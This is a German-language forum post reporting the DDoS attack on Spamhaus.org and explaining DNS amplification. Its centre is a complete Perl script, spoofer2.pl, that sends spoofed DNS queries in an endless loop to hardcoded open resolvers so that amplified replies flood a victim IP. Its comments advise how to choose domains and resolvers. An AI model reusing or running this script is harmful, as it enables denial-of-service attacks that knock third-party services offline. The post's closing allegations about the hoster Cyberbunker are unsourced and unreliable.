Security Mega DDoS auf Spamhaus.org

rat

Stammuser
Nahezu unbemerkt von der Öffentlichkeit wurde Spamhaus.org opfer einer der grösten Distributed-DoS-Attacke in der Geschichte des Internet.

Spamhaus hatte IP-Adressblöcke des sehr Spammer-freundlich bekannten Hosters Cyberbunker.com auf seine Blacklist gesetzt.Was dazu führte das Cyberbunker-Kunden plötzlich kaum noch Mails absetzen konnten.

Nur wenig später startete eine zunächst gemäßigte, dann stark ansteigende DDoS-Attacke auf die Server von Spamhaus.Nach Angaben von Akamai erreichte die Attacke eine Stärke von bis zu 300 GBit/s.Nur wenige Stunden später hat Spamhaus das Security-Unternehmen Cloudflare mit der Abwehr beauftragt.Ein großteils des Traffic´s erzeugten die Angreifer mit einer "DNS Amplification Attack" was zu gleich zeigt dass es tausende offene DNS-Server gibt,die auf jede Anfrage ungeprüft reagieren.

Jede Anfrage etwa 36 Byte lang,angefragt wurde aber nur ein DNS-Zonen-File von rund 3000 Zeichen Länge,was jede Anfrage von den DNS-Serverm um den Faktor 100 verstärkt.Cloudflare habe mindestens 30.000 anfragende DNS-Server registriert, erläutert Matthew Prince Chef von Cloudflare in einem Blog Eintrag.

Demzufolge haben die Angreifer nur 750 MBit/s abgehende Bandbreite benötigt, um einen durchschnittlichen Traffic von 75 GBit/s bei Spamhaus zu erzeugen.

153o8ig.jpg

Bildquelle: Security Tools News & Tips

spoofer2.pl (Full version of spoofer.pl.txt, a DNS recursion bandwidth amplification attack proof of concept. Written in Perl).
Code:
#!/usr/bin/perl
# Get Net::RawIP at http://search.cpan.org/CPAN/authors/id/S/SZ/SZABGAB/Net-RawIP-0.21_01.tar.gz
# cpan Net::DNS:Resolver seems to work fine on each machine I throw it on, as well.
# PS: To see if you can spoof, check out the ANA Spoofer project.
# http://spoofer.csail.mit.edu/
#
# Written by Shadow
# irc.dark-irc.net #thecorpz
# chemshadow@gmail.com

use Net::DNS::Resolver;
use Net::RawIP;
use strict;

# Populate this list with domain names with lots of A records. IRC server DNS pools are a good place to look.
# Maybe get a cheap throwaway domain and add your own A records.
my @name = ("irc.efnet.net", "irc.dal.net", "irc.undernet.org", "irc.freenode.net");
my $names = "3"; #number of entries in @name, minus one.

# Populate this list with ONLY open, recursive dns servers.
# http://www.dnsstuff.com/ - Block their cookies to use the site w/o paying.
my $nameservers;
my @nameservers = ("205.234.223.168", "64.202.117.121", "208.80.184.69", "200.255.59.150") #4 entries.

my $reflectors = "3"; # Number of entries in @nameservers, minus one.
my $debug = 1; # Change to 0 if you don't wanna have your console flooded.

##########################
# END USER CONFIGURATION #
##########################

my $str;
my $name;
my $src_ip;
my $reflector;
$src_ip = $ARGV[0];

if ($ARGV[0] eq '') { print "Usage: " . $0 . " <IP>\n"; exit(0); }
print ("Hitting $ARGV[0]\n");

for (my $i=0; $i < 256; $i++) {
    # Make DNS packet
    my $dnspacket = new Net::DNS::Packet($str, "A", "IN");
    my $dnsdata = $dnspacket->data;
    my $sock = new Net::RawIP({udp=>{}});
    # send packet
    $str = @name[int rand($names)];                            # Select entry from @name
    $reflector = $nameservers[int rand($reflectors)];          # Select entry from @nameservers
    $sock->set({ip => {
                saddr => $src_ip, daddr => "$reflector", frag_off=>0,tos=>0,id=>1565},
                udp => {source => 53,
                dest => 53, data=>$dnsdata
                } });
    $sock->send;
    if ($debug eq "1") { print "Me -> " . $reflector . "(DNSing " . $str . ")" . " -> " . $src_ip . " \n"; }
    $i = 0;
}
exit(0);

DNS-Amplification-Attacks.pdf
This paper outlines a Distributed Denial of Service (DDoS) attack which abuses open recursive Domain Name System (DNS) name servers using spoofed UDP packets. A network analysis of one of these attacks is looked at in detail.
http://packetstormsecurity.com/files/44824/DNS-Amplification-Attacks.pdf.html

Akamai habe erhebliche Auswirkungen auf die weltweite Netzauslastung durch den Angriff beobachtet.

Cyberbunker.com ist ein Hoster der von Kriminellen jeglicher art genutzt wird,hier finden sich child pornography,Foren verschiedener Terrorister Vereinigungen wie auch Malware.Dem Namen nacht der Hoster sich alle ehere darin das er seine Server so wie Büro´s wirklich in einem Bunker aus dem Kaltenkrieg angesiedelt hat.

1ovaef.jpg

Bildquelle: Wikipedia
 
Zuletzt bearbeitet:
Oben